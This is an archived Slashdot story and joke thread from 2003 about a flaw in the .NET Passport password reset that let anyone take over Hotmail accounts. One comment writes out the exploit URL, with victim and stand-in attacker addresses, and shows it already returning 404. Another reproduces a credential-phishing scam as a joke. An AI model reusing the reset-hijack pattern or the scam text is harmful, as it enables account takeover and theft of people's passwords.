Security Vulnerability in Microsoft .NET Passport

← Back to Stories (view on slashdot.org)

Security Vulnerability in Microsoft .NET Passport

Posted by michael on Thursday May 8, 2003 @12:15AM from the doh dept.

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

45 of 433 comments (clear)

Remember... by stu_coates · 2003-05-08 00:16 · Score: 5, Funny

Remember folks, this is Trustworthy Computing! ;-)
1. Re:Remember... by rf0 · 2003-05-08 00:31 · Score: 3, Funny
  
  I wouldn't trust them to feed my fish.
  
  Rus
  
  --
  Cheap UK and US VPS
2. Re:Remember... by Gortbusters.org · 2003-05-08 00:40 · Score: 5, Funny
  
  That's one degree of difference with .NET!
  
  --
  --------
  Free your mind.
3. Re:Remember... by jkrise · 2003-05-08 00:54 · Score: 4, Funny
  
  " according to a dutch news site this hole was fixed shortly after the posting... "
  
  If sending 404 Page Not Found messages to users trying to update passwords can be called fixing, well, MS indeed fixed it.
  
  --
  If you keep throwing chairs, one day you'll break windows....
4. Re:Remember... by mbourgon · 2003-05-08 01:16 · Score: 4, Funny
  
  MS has admitted that Trustworthy Computing has nothing to do with security. It's all about whether you trust Microsoft. Do you trust them enough to give them money? If so, they've met their goals.
  
  --
  "Sometimes a woman is a kind of religion, she can save your soul & set you free from all your sins" - Bad Examples
Oh my God (Mad scramble) by LookSharp · 2003-05-08 00:18 · Score: 5, Funny

Ahhh! I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past... /obvious
1. Re:Oh my God (Mad scramble) by Anonymous Coward · 2003-05-08 00:52 · Score: 5, Funny
  
  I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!
  
  Don't bother, I just did it for you.
As lame as it sounds... by Anonymous Coward · 2003-05-08 00:19 · Score: 5, Funny

...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....
Security flaw in Passport!!!! by grahamlee · 2003-05-08 00:20 · Score: 5, Funny

In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.
1. Re:Security flaw in Passport!!!! by jkrise · 2003-05-08 00:27 · Score: 2, Funny
  
  "the England cricket team haven't won anything"
  
  I thought they won a moral victory by not travelling to Zimbabwe... and a political victory by making Zim fly to England. Bad example?
  
  --
  If you keep throwing chairs, one day you'll break windows....
2. Re:Security flaw in Passport!!!! by rifter · 2003-05-08 00:51 · Score: 3, Funny
  
  twice two is four
  
  It seems you are overdue for your appointment at miniluv, thought criminal!
The Microsoft Information Minster Says: by retards · 2003-05-08 00:22 · Score: 5, Funny

We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!
1. Re:The Microsoft Information Minster Says: by Anonymous Coward · 2003-05-08 00:42 · Score: 0, Funny
  
  What's an AC?
  
  Air Conditioner. I don't think air conditioners are actually banned from moderating, but I've never heard of one that could.
now be fair by Joe+the+Lesser · 2003-05-08 00:22 · Score: 4, Funny

unsuccessful attempts to contact Microsoft.

It's not their fault Outlook kept crashing, right?

--
"I only speak the truth"
Karma: null(Mostly affected by an unassigned variable)
Ruh Roh Raggy by Ralph+Wiggam · 2003-05-08 00:23 · Score: 4, Funny

Holy Crap!

If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

With .NET, there's only one degree of seperation between me and evil crackers.

-B
1. Re:Ruh Roh Raggy by archen · 2003-05-08 00:51 · Score: 5, Funny
  
  If you have a penis AND breasts (and feel the need to enlarge them) you probably really do have a lot of secrets...
good by Nevrar · 2003-05-08 00:23 · Score: 5, Funny

"...the victim's accounts..."

It's nice to see people are finally realising that Passport/Hotmail users are victims. ;)

--
Nevrar
Oh no by Rik+Sweeney · 2003-05-08 00:24 · Score: 5, Funny

A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account

But that spam is personal to me. It's not for anyone else.

--
Summation 2
Finally... by rf0 · 2003-05-08 00:25 · Score: 2, Funny

All those l33t hax0r can now stop asking how to hack hotmail. The answers right here (if it wasn't 404'd)

Rus

--
Cheap UK and US VPS
Well, at least now I know... by johannesg · 2003-05-08 00:26 · Score: 5, Funny

...where I don't want to go today.
Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...
Really tough fix by alteridem · 2003-05-08 00:27 · Score: 2, Funny

Sounds like a really tough fix... Delete the offending page... "There, see, its secure."
Microsoft .NET Passport Passwords.. :-) by jkrise · 2003-05-08 00:30 · Score: 1, Funny

Repeat this rapidly ten times, and watch your tongue get locked faster than Windows XP!!

--
If you keep throwing chairs, one day you'll break windows....
Whoever has got... by archetypeone · 2003-05-08 00:32 · Score: 5, Funny

victim@hotmail.com or attacker@attacker.com is going to be really pissed...
Re:Can someone explain this? by Anonymous Coward · 2003-05-08 00:32 · Score: 5, Funny

I believe that .NET was the cause of the .COM crash. The shit hit the fan around the same time. What a catalyst !
Try stealing billgates@hotmail.com by jkrise · 2003-05-08 00:37 · Score: 2, Funny

You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(

--
If you keep throwing chairs, one day you'll break windows....
1. Re:Try stealing billgates@hotmail.com by miscGeek · 2003-05-08 00:50 · Score: 1, Funny
  
  Even Billy Boy knows better than to trust M$ with his credit card information :)
  
  --
  May the source be with you!
2. Re:Try stealing billgates@hotmail.com by rf0 · 2003-05-08 00:51 · Score: 3, Funny
  
  or just go for abuse@hotmail.com.
  
  Rus
  
  --
  Cheap UK and US VPS
3. Re:Try stealing billgates@hotmail.com by Anonymous Coward · 2003-05-08 01:27 · Score: 3, Funny
  
  That reminds me of the time I and a friend noticed a free mail provider that had forgotten to reserve certain interesting (to say the least) addresses.
  
  I got webmaster@... and I believe my friend got administrator@...
  
  I don't know if my friend got any mail, but I got a lot of interesting messages until I got bored and stopped checking it :-)
  
  Now, before any of you start bashing me for being irresponsible, I did try to help out the users who sent me mail. Mostly I just told them who to really contact.
  
  I did get carried away a couple of times though. Once I decided to reply to a spam complaint and thanked them for the nice porn links they forwarded to me. They never responded, funny thing.
  
  (this posted anonymously for obvious reasons)
Add one to the pile by Ashyukun · 2003-05-08 00:50 · Score: 5, Funny

Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.
1. Re:Add one to the pile by FauxPasIII · 2003-05-08 01:05 · Score: 3, Funny
  
  I think I speak for everyone here when I ask... What's your last name ?!
  
  --
  25% Funny, 25% Insightful, 25% Informative, 25% Troll
2. Re:Add one to the pile by dubstop · 2003-05-08 01:14 · Score: 5, Funny
  
  That's how it starts.
  
  In fifty years time, when Microsoft are in charge of the planet, they won't be asking you to change your last name, they'll be telling you that they've already changed your entire name to a 256-character, globally unique identifier. For your convenience, of course, and at a very reasonable fee of M$50 (MicroSerfian dollaroonies), which, again for your convenience, they've already deducted from your (compulsory) Bank of Microsoft account. As a result of this unexpected deduction, your account will go M$1 overdrawn, and this will mean that they are entitled to immediate vacant possession of your home. When you query this, it will be pointed out that this entitlement was clearly detailed in 2-point font, on page 437 (that's about one-third of the way in) of the click-through agreement that you read, understood, and click-through-agreed to when opening your (compulsory) Bank of Microsoft account. At the time that this is pointed out, your attention will be drawn to the clause on page 442 that they are also entitled to one of every major organ that you have two of. This includes (but is not limited to) your lungs, kidneys and, at the discretion of the Microsoft legal department (formerly known as the US Department of Justice), your testicles. They will gladly help you to pay for the operation to remove these organs, by the extension of a small loan, repayable in 7200 monthly payments that, for your convenience, will exactly match your monthly salary. You will be responsible for the shipping of at least two of your children to the secure holding facility at Redmond, where they will be held as collateral for the duration of the loan.
  
  Where do you want to go today?
3. Re:Add one to the pile by pcardoso · 2003-05-08 01:30 · Score: 3, Funny
  
  funny... I just had the same problem while registering an hotmail account for my girlfriend to use, so we could IM each other... most of our contacts are MSN addresses, so Windows Messenger was the best choice. I don't like that much, but what the hell! Gaim has no problems with that..
  
  Back to the topic, her name is Ana Luisa and guess what happens when you concatenate her first two names together! It was getting on my nerves to receive a error message because of some issue with the username (but not an existing username, oddly)... It was only after a lot of attempts that I noticed the first 4 chars of the username... Added a underscore and it was all ok...
Re:FUD by Bendy+Chief · 2003-05-08 00:53 · Score: 1, Funny

This, friend, is why I write my passwords on all my personal effects!
It's handy-dandy, and I've never had a probASDFK6GJL45SDJ6G-CARRIER LOST-
Re:How do you contact Microsoft? by PerryMason · 2003-05-08 00:53 · Score: 4, Funny

Do they actually have a procedure to inform them when things are broken?

As far as i'm aware, they have a guy who just keeps clicking reload on the /. front page waiting for a new MS vulnerability story to pop up. They tried the same thing with Bugtraq but there were just way too many vulnerabilities for the poor guy to keep up.

--
"I'm tired of all this 'Aren't humanity great' bullshit. We're a virus with shoes" - Bill Hicks
Funny stuff by Anonymous Coward · 2003-05-08 00:55 · Score: 2, Funny

From the passport.net page, in a big green box, under the title "SECURITY", it reads:

Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.
Could be worse... by Ratface · 2003-05-08 01:08 · Score: 1, Funny

They could fix it by making it impossible to enter arbitrary URLs in the next version of Internet Explorer :-D

--

A little planning goes a long way...
Re:Oh no, not again... by Anonymous Coward · 2003-05-08 01:21 · Score: 1, Funny

Microsoft hires only "geniuses", i.e., no common sense whatever!
Re:FUD by mulhall · 2003-05-08 01:29 · Score: 2, Funny

You seem to be under the the impression that legitimate users actually change their passwords - what planet are you living on?!
Re:Can someone explain this? by Kredal · 2003-05-08 01:33 · Score: 2, Funny

So if I start the .ORG service, can I kill the .NET system?

So who wants to join the .ORG at my place next friday? (:

--
Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
Re:FUD by Exedore · 2003-05-08 01:37 · Score: 4, Funny

Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
Me: Thanks. How did you fix them?
Mechanic: We removed the brakes entirely
Me: What the...
Mechanic: That will be $567.98, please.

--
I take drugs seriously.
Re:Oh my God (MS explains it all..) by jkrise · 2003-05-08 01:37 · Score: 4, Funny

It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).

Of course, this means that Full Control of user accounts is needed. The process of manually cheking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport .Net will be re-activated.

This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.

--
If you keep throwing chairs, one day you'll break windows....
Another Hotmail Password Hack found on Kazaa by doublem · 2003-05-08 01:39 · Score: 5, Funny

Hotmail password hacker.doc

THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD

Step 1:
send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line

Step 2: The email body
In the first line: put the complete email address of the user whose password you want.

In the 5th line, type the email address and the login (pass) you want the password sent to,
here is an exemple:

To: Robot_pass_finder@hotmail.com
Subject: PW: fetchpass
CC.________________ BCC.___________________
=-email body-=

address@hotmail.com

your email adress here example.: myemail@hotmail.com
your pass here example.: mypassword

--
"Live Free or Die." Don't like it? Then keep out of the USA
The problem with global accounts like Passport by Jugalator · 2003-05-08 01:41 · Score: 2, Funny

One Company to rule them all
One Hacker to find them
One Exploit to bring them all
to the attacker's power

--
Beware: In C++, your friends can see your privates!
Re:What breed of idiot are you? by Dark+Lord+Seth · 2003-05-08 01:42 · Score: 2, Funny

lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?l c=1033&em=victim@hotmail.com&id=&cb=&prefem=attack er@attacker.com&rst=1' HTTP/1.1 404 Not Found Server: Apache/2.0.43 (Unix) Date: Thu, 08 May 2003 13:10:14 GMT PPServer: H: LAWPPREGU4A002

This would be allot more fun to see though...

--
Hate me!
*Sigh* by White+Roses · 2003-05-08 03:40 · Score: 2, Funny

The unfortunate thing is that I don't know anyone who is both (a) stupid enough to use Hotmail and (b) grotesquely stupid enough to store personal information in Passport.
I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.
But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).

--
Do not touch -Willie